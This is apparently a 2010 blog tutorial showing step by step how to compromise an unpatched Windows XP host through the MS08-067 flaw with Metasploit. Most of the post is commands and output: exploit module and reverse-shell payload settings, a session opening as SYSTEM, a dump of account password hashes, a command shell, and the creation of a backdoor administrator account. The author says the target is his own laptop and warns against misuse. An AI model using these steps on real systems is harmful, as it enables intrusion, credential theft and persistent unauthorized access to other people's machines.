Tuesday, February 2, 2010

metaspoilt [ms08_067] - conflicker

still remember the conflicker ? what is the damage to your company when this things spread out??

ms08-067 is a patches to prevent conflicker.
here im going to attack the machine which dont patches the ms08-067 by using metaspoilt.

requirement:-

system = ubuntu 9.10

apps = metaspoilt

(i dont/wont show how to install metaspoilt in ubuntu, as system admin,you guy please figure out by yourself. )


To execute msf,

#./opt/metaspoilt/msfconsole

then call the exploit module:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.19
RHOST => 192.168.1.19
noted:RHOST is remote host,meaning your victim

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.17
LHOST => 192.168.1.17
noted:LHOST is local host,the box you running msf

msf exploit(ms08_067_netapi) > set LPORT 4444
LPORT => 4444
note:LPORT is local port,the port you want to use. we use 4444 as example

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp
note:set the payload to do attack

msf exploit(ms08_067_netapi) > exploit
note: exploit the victim host


  • Started reverse handler on port 4444
  • Automatically detecting the target…
  • Fingerprint: Windows XP Service Pack 2 – lang:English
  • Selected Target: Windows XP SP2 English (NX)
  • Triggering the vulnerability…
  • Sending stage (725504 bytes)
  • Meterpreter session 1 opened (192.168.1.17:4444 -> 192.168.1.19:1442)
  • note:see the last line ??you successful created the session between your box and victim's box

    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    note:getuid to see the system

    meterpreter > run hashdump


  • Obtaining the boot key…
  • Calculating the hboot key using SYSKEY bb35d43e0a531b188967bb43ce0f4823…
  • Obtaining the user list and keys…
  • Decrypting user keys…
  • Dumping password hashes…

    Administrator:500:281b94b1e665a2b2aad3b435b51404ee:361db25d1614b529c719205dfc0d7420:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:5416885c50a87bdd115df056849a0a33:62a470b79584552188d83ce96f2482b2:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:aff70073db96549d5ecceb973af24bcc:::
    chenghui:1003:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
    ASPNET:1004:7bb95a870045309f8d5f5b133fbbefd5:38982698a41a6030a410d68d50428bf3:::
    admin:1011:08fd436b7baa45341b4d308d3f102048:f7cabbe13fd7b71848064cbb40c5c13e:::
    __vmware_user__:1013:c9d38fa38122a3212d28a90ef0e5c0c5:3f06c5556c2f5aaeeb4cb499ab9681e7:::

    note:run hashdump, i had dumped all user account's hash key。
    if you do not want to add new account into this host,think how to break the hash。
    tips: cain and abel

    meterpreter > shell
    Process 4288 created.
    Channel 2 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    note:issue shell command. i owned the shell。 hehe

    C:\WINDOWS\system32>ipconfig
    ipconfig

    Windows IP Configuration

    Ethernet adapter VMware Network Adapter VMnet8:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.81.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter VMware Network Adapter VMnet1:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.136.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter Wireless Network Connection:

    Media State . . . . . . . . . . . : Media disconnected

    Ethernet adapter VirtualBox Host-Only Network:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.56.1
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . :

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 192.168.1.19
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.1
    note:ipconfig, it's works。


    C:\WINDOWS\system32>net user a13x P@ssw0rd /add
    net user a13x P@ssw0rd /add
    The command completed successfully.
    note:i try to add adduser。 ^^ please practice the windows command。

    C:\WINDOWS\system32>net localgroup Administrators a13x /add
    net localgroup Administrators a13x /add
    The command completed successfully.
    note:i add myself into administrators group。 damn eveil

    you can play with this host with windows command like net view ,net use, tasklist ,taskkill, net service and etc.
    please practice more with windows command

    the victim is my laptop , running with windows xp sp2, windows firewall on, mcafee disabled。

  • ENJOY HACKING, please do not harm other ppl because this is misuse of computer. You can be send to jail !!

    No comments: